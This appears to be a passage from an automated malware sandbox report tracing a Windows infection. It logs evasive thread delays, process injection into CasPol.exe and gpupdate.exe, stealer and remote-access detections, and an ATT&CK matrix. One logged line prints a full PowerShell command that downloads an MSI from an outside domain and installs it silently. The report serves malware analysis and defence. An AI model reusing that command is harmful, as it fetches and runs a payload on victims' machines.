            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -36652s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -59535s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -48717s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -59423s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -59311s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -57037s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -59199s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -36235s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -59088s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -58976s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -58864s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -58752s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -58640s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -58527s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -47824s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -58416s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -32306s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -58305s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -58193s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -43825s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -58083s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -57971s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -55515s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -57859s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -54015s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -57748s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -57636s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -57524s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -57412s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -40419s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -57301s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -34383s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -57188s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -57077s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -56965s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -32206s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -56854s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -56740s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -38270s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -56627s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -53114s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -56517s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -46867s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -56405s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -56294s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -50216s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -56183s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -35736s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -56069s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -31383s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -55958s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -35156s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -55847s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -55737s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -55624s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -40332s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -55514s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -56923s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -55402s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -56458s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -55290s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -57901s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -55178s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -58144s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -55067s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -54953s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -58984s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -54840s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -40418s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -54731s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -35578s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -54618s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 6856Thread sleep time: -52108s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe TID: 8312Thread sleep time: -54507s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 60000
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 34428
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 59888
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 59361
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 59776
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 59647
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 36652
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 59535
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 48717
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 59423
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 59311
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 57037
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 59199
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 36235
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 59088
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 58976
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 58864
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 58752
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 58640
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 58527
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 47824
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 58416
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 32306
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 58305
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 58193
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 43825
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 58083
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 57971
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 55515
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 57859
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 54015
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 57748
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 57636
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 57524
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 57412
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 40419
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 57301
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 34383
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 57188
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 57077
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 56965
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 32206
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 56854
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 56740
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 38270
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 56627
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 53114
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 56517
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 46867
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 56405
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 56294
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 50216
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 56183
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 35736
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 56069
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 31383
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 55958
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 35156
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 55847
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 55737
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 55624
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 40332
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 55514
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 56923
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 55402
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 56458
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 55290
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 57901
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 55178
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 58144
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 55067
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 54953
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 58984
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 54840
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 40418
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 54731
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 35578
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 54618
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 52108
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeThread delayed: delay time: 54507
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeMemory written: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe protection: read write
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe protection: read write
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeSection loaded: NULL target: C:\Windows\SysWOW64\gpupdate.exe protection: read write
            Source: C:\Windows\System32\msiexec.exeMemory written: C:\Users\user\AppData\Local\Inkberry\launchultra.exe base: 3340000
            Source: C:\Windows\System32\msiexec.exeMemory written: C:\Users\user\AppData\Local\Inkberry\launchultra.exe base: 318B2D8
            Source: C:\Windows\System32\msiexec.exeMemory written: C:\Users\user\AppData\Local\Inkberry\launchultra.exe base: 318C1E8
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi; msiexec /i C:\Users\Public\7bc.msi /qn"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" /i C:\Users\Public\7bc.msi /qn
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeProcess created: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe C:\Users\user\AppData\Local\Temp\73763\CasPol.exe
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeProcess created: C:\Windows\SysWOW64\gpupdate.exe C:\Windows\SysWOW64\gpupdate.exe
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeProcess created: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe "C:\Users\user\AppData\Local\Temp\73763\CasPol.exe"
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Inkberry\launchultra.exeQueries volume information: C:\Users\user\AppData\Local\Temp\aedb672e VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeQueries volume information: C:\Users\user\AppData\Local\Temp\73763\CasPol.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\73763\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000001A.00000002.2340360326.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2268529514.0000000007724000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2188352785.00000000048C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2340360326.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2268529514.0000000007724000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2188352785.00000000048C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000001A.00000002.2340360326.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2268529514.0000000007724000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2188352785.00000000048C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Replication Through Removable Media
            Windows Management Instrumentation1
            Windows Service
            1
            Windows Service
            31
            Masquerading
            OS Credential Dumping11
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Browser Extensions
            311
            Process Injection
            1
            Disable or Modify Tools
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt11
            DLL Side-Loading
            11
            DLL Side-Loading
            41
            Virtualization/Sandbox Evasion
            Security Account Manager41
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Extra Window Memory Injection
            311
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            DLL Side-Loading
            LSA Secrets11
            Peripheral Device Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            File Deletion
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Extra Window Memory Injection
            DCSync124
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            https://ravinn.com0%Avira URL Cloudsafe
            SourceDetectionScannerLabelLink
            C:\Windows\Installer\MSIE263.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\73763\CasPol.exe0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
